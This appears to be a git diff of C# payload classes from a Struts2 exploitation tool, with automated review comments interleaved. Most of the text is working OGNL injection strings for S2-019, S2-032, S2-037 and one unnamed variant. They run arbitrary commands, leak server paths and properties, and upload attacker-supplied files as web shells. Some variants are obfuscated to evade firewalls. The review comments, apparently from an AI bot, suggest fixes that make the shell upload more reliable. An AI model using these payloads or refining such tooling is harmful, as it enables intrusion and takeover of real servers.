+ private String Exp_Check = "redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22struts2_security_%22%29,%23resp.getWriter%28%29.print%28%22check%22%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+
+ //private String Exp_VerInfo = "redirect:$%7b%23_memberAccess%3d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28%40java.lang.System%40getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //绕过部分waf
+ private String Exp_VerInfo = "redirect:$%7b%23_member%41ccess%3d%40og%6el.Og%6elCo%6etext%40DEFAULT_MEMBER_%41CCESS,%23req%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28%40java.lang.%53ystem%40getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ private String Exp_Path="redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22web%22%29,%23resp.getWriter%28%29.print%28%22path:%22%29,%23resp.getWriter%28%29.print%28%23req.getSession%28%29.getServletContext%28%29.getRealPath%28%22/%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //private String Exp_Exec = "redirect:$%7b%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%27[cmd]%27.toString%28%29.split%28%27\\\\s%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ //绕过部分waf
+ private String Exp_Exec = "redirect:$%7b%23req%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.%50rocessBuilder%28%27[cmd]%27.toString%28%29.split%28%27\\\\s%27%29%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23co%6etext.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29%7d";
+
+ private String Exp_Upload = "redirect:$%7b%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%23req.getRealPath(%27/[pathfilename]%27)%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29%7d&shell=[filecontent]";
+ //自定义路径
+ private String Exp_SetMyUpload = "redirect:$%7b%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.File%28%27[path]%27%29.mkdirs%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[pathfilename]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29%7d&shell=[filecontent]";
+
- private String Exp_Path="redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_Exec = "redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27[cmd]%27.toString().split(%27\\\\s%27))).start().getInputStream()).useDelimiter(%27\\\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}";
- private String Exp_Upload = "redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22oko%22),%23res.getWriter().print(%22kok/%22),%23res.getWriter().print(%23req.getContextPath()),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter([path])).append(%23req.getParameter(%22shell%22)).close()}&shell=[filecontent]";
public String Get_Exp_Check()
{
return this.Exp_Check;
@@ -31,13 +45,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "%23req.getRealPath(%22/"+ fileName + "%22)";
- this.Exp_Upload=this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload=this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "%22"+path+ "%22");
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]",path+"/"+fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
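Review bot: At L603–L604 the user-supplied `path` and `fileName` are spliced raw into `Exp_SetMyUpload`, where they end up both inside a URL-encoded query string and inside an OGNL single-quoted literal (`%27[path]%27`), so a space, `&`, `#`, `+`, a `'` or a Windows backslash in the chosen directory corrupts either the request or the expression before it reaches the target. Escape for the literal and encode for the transport: `var ognlPath = path.Replace("\\", "\\\\").Replace("'", "\\'");` then `this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", Uri.EscapeDataString(ognlPath));` and the same treatment for `[pathfilename]`. Both templates are also overwritten in place, so a second call on the same instance finds no placeholders and silently reuses the first target; building the substituted string into a local instead of assigning back to the field avoids that. The file header for this hunk is outside this chunk, so which Struts payload class this is cannot be confirmed here.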
diff --git a/Test/payload/S2019.cs b/Test/payload/S2019.cs
index 23bd6f6..8400f8c 100644
--- a/Test/payload/S2019.cs
+++ b/Test/payload/S2019.cs
@@ -6,13 +6,16 @@ namespace payload
{
public class S2019:BasePayload
{
- private String Exp_Check = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22struts2_security_%22),%23resp.getWriter().print(%22check%22),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_VerInfo = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22[vername]:%22),%23resp.getWriter().print(@java.lang.System@getProperty(%22[vername]%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Path= "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(%22web%22),%23resp.getWriter().print(%22path:%22),%23resp.getWriter().print(%23req.getSession().getServletContext().getRealPath(%22/%22)),%23resp.getWriter().flush(),%23resp.getWriter().close()";
+ private String Exp_Check = "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22struts2_security_%22%29,%23resp.getWriter%28%29.print%28%22check%22%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_VerInfo = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22[vername]:%22%29,%23resp.getWriter%28%29.print%28@java.lang.System@getProperty%28%22[vername]%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Path= "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28%22web%22%29,%23resp.getWriter%28%29.print%28%22path:%22%29,%23resp.getWriter%28%29.print%28%23req.getSession%28%29.getServletContext%28%29.getRealPath%28%22/%22%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
//部分情况获取不到结果
- //private String Exp_Exec = "debug=command&expression=%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%22[cmd]%22)).start().getInputStream()).useDelimiter(%27\\\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Exec = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().print(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%22[cmd]%22).getInputStream())),%23resp.getWriter().flush(),%23resp.getWriter().close()";
- private String Exp_Upload = "debug=command&expression=%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23res%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23res.getWriter().print(%22oko%22),%23res.getWriter().print(%22kok/%22),%23res.getWriter().print(%23req.getContextPath()),%23res.getWriter().flush(),%23res.getWriter().close(),new+java.io.BufferedWriter(new+java.io.FileWriter([path])).append(%23req.getParameter(%22shell%22)).close()&shell=[filecontent]";
+ //private String Exp_Exec = "debug=command&expression=%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23s%3dnew%20java.util.Scanner%28%28new%20java.lang.ProcessBuilder%28%22[cmd]%22%29%29.start%28%29.getInputStream%28%29%29.useDelimiter%28%27\\\\AAAA%27%29,%23str%3d%23s.hasNext%28%29?%23s.next%28%29:%27%27,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.println%28%23str%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Exec = "debug=command&expression=%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27%29,%23resp%3d%23context.get%28%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27%29,%23resp.setCharacterEncoding%28%27UTF-8%27%29,%23resp.getWriter%28%29.print%28@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%22[cmd]%22%29.getInputStream%28%29%29%29,%23resp.getWriter%28%29.flush%28%29,%23resp.getWriter%28%29.close%28%29";
+ private String Exp_Upload = "debug=command&expression=%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[path]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29&shell=[filecontent]";
+ private String Exp_SetMyUpload = "debug=command&expression=%23req%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29,%23res%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23res.getWriter%28%29.print%28%22oko%22%29,%23res.getWriter%28%29.print%28%22kok/%22%29,%23res.getWriter%28%29.print%28%23req.getContextPath%28%29%29,%23res.getWriter%28%29.flush%28%29,%23res.getWriter%28%29.close%28%29,new+java.io.File%28%27[path]%27%29.mkdirs%28%29,new+java.io.BufferedWriter%28new+java.io.FileWriter%28%27[pathfilename]%27%29%29.append%28%23req.getParameter%28%22shell%22%29%29.close%28%29&shell=[filecontent]";
+
+
public String Get_Exp_Check()
{
return this.Exp_Check;
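Review bot: In `Exp_SetMyUpload` (L633) the `oko`/`kok/` success marker is printed, flushed and the writer closed before `new java.io.File(...).mkdirs()` and the `FileWriter` run, so the client reports a successful upload even when the directory cannot be created or the write throws; `Exp_Upload` (L632) has the same ordering. Move the `mkdirs()` and `BufferedWriter(...).close()` calls ahead of the first `#res.getWriter().print(...)`, as S2032's `Exp_Upload_Path` in this same commit does (write first, then `#w.print(#parameters.info1[0])`). `mkdirs()` returns false rather than throwing on failure, so with the write moved first a failed directory creation will at least surface through the subsequent `FileWriter` exception instead of being masked by an already-closed response.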
@@ -32,13 +35,15 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- path = "%23req.getRealPath(%22/"+ fileName + "%22)";
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", path);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
- this.Exp_Upload = this.Exp_Upload.Replace("[path]", "%22"+path+ "%22");
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[path]", path);
+ this.Exp_SetMyUpload = this.Exp_SetMyUpload.Replace("[pathfilename]", path+"/"+ fileName);
+ return this.Exp_SetMyUpload.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
+
}
}
}
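Review bot: Lines 645 and 650–651 assign the substituted payload back into the template fields, so after one call `Exp_Upload` / `Exp_SetMyUpload` contain no placeholders and any later `Get_Exp_Upload` on the same `S2019` instance silently returns the previous file name and content. Substitute into a local instead: `var exp = this.Exp_SetMyUpload.Replace("[path]", path).Replace("[pathfilename]", path + "/" + fileName); return exp.Replace("[filecontent]", fileContent);`, and likewise for the default branch. The `"".Equals(path)` guard (L641) also lets a null `path` fall into the custom branch, where `null + "/" + fileName` yields a root-relative `/name`; `string.IsNullOrEmpty(path)` matches the intent better. Whether callers construct a fresh payload object per request is not visible in this hunk.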
diff --git a/Test/payload/S2032.cs b/Test/payload/S2032.cs
index cfb9ddf..b9af1cf 100644
--- a/Test/payload/S2032.cs
+++ b/Test/payload/S2032.cs
@@ -10,9 +10,9 @@ public class S2032:BasePayload
private String Exp_VerInfo = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.vername[0]),%23w.print(@java.lang.System@getProperty(%23parameters.verval[0])),%23w.close(),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&vername=[vername]%3a&verval=[vername]";
private String Exp_Path = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),%23w.close(),1?%23xx:%23request.toString&pp=%2f&encoding=UTF-8&web=web&path=path%3a";
private String Exp_Exec = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=[cmd]&pp=\\\\AAAA&ppp=%20&encoding=UTF-8";
- private String Exp_Upload = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[filename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
- private String Exp_Upload_Path= "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[path]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
-
+ private String Exp_Upload = "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23path%2b%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+ private String Exp_Upload_Path= "method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23path%3d%23req.getRealPath(%23parameters.pp[0]),new+java.io.File%28%23parameters.path[0]%29.mkdirs%28%29,new%20java.io.BufferedWriter(new%20java.io.FileWriter(%23parameters.shellname[0]).append(%23parameters.shellContent[0])).close(),%23w.print(%23parameters.info1[0]),%23w.print(%23parameters.info2[0]),%23w.print(%23req.getContextPath()),%23w.close(),1?%23xx:%23request.toString&path=[path]&shellname=[pathfilename]&shellContent=[filecontent]&encoding=UTF-8&pp=%2f&info1=oko&info2=kok%2f";
+
public String Get_Exp_Check()
{
return this.Exp_Check;
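Review bot: `Exp_Upload_Path` (L671) still assigns `#path=#req.getRealPath(#parameters.pp[0])` but never reads `#path` now that the file is written to `#parameters.shellname[0]` directly; S2037's counterpart in this same commit dropped that assignment, and the two expressions should stay parallel, which also makes the trailing `&pp=%2f` parameter dead. Passing the directory as a separate `&path=` request parameter rather than inlining it into an OGNL literal is the right shape, since it sidesteps quote and backslash escaping. The boolean result of `mkdirs()` is discarded, so a directory that cannot be created is only reported indirectly through the later `FileWriter` failure; a comment on the field noting that is worth adding.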
@@ -32,12 +32,14 @@ public String Get_Exp_Upload(String path,String fileName,String fileContent)
{
if ("".Equals(path))
{
- this.Exp_Upload = this.Exp_Upload.Replace("[filename]", fileName);
+ this.Exp_Upload = this.Exp_Upload.Replace("[pathfilename]", fileName);
+ return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
else {
+ this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[pathfilename]", path+"/"+ fileName);
this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[path]", path);
+ return this.Exp_Upload_Path.Replace("[filecontent]", fileContent);
}
- return this.Exp_Upload.Replace("[filecontent]", fileContent);
}
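Review bot: `path + "/" + fileName` (L685) and `path` (L686) are substituted unencoded into a query string (`&path=...&shellname=...`), so any `&`, `+`, `%`, `#` or space in a user-chosen directory truncates or corrupts the parameter before OGNL ever sees it. Encode at substitution: `this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[pathfilename]", Uri.EscapeDataString(path + "/" + fileName));` and `this.Exp_Upload_Path = this.Exp_Upload_Path.Replace("[path]", Uri.EscapeDataString(path));`. Whether the caller already encodes these values is not visible here; if it does, a comment on the parameters saying so would spare the next reader the question. As elsewhere in this commit, the substituted string is written back into the template field, so the method only works once per instance.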
diff --git a/Test/payload/S2037.cs b/Test/payload/S2037.cs
index f1c0070..3be8763 100644
--- a/Test/payload/S2037.cs
+++ b/Test/payload/S2037.cs
@@ -10,8 +10,8 @@ public class S2037:BasePayload
private String Exp_VerInfo = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.vername[0]),%23w.print(@java.lang.System@getProperty(%23parameters.verval[0])),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&vername=[vername]%3a&verval=[vername]";
private String Exp_Path = "(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23req%3d%40org.apache.struts2.ServletActionContext%40getRequest(),%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23path%3d%23req.getRealPath(%23parameters.pp[0]),%23w%3d%23res.getWriter(),%23w.print(%23parameters.web[0]),%23w.print(%23parameters.path[0]),%23w.print(%23path),%23w.close()):xx.toString.json?&pp=%2f&encoding=UTF-8&web=web&path=path";
